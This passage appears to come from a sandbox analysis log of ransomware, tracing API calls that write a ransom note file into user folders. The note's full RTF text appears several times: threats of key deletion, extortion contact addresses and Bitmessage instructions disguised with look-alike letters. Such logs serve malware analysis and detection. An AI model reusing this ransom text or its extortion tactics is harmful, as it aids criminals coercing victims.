\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.169] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.170] CloseHandle (hObject=0x2e8) returned 1 [0292.170] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\#readme_eman#.rtf")) returned 0xffffffff [0292.170] GetLastError () returned 0x2 [0292.170] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 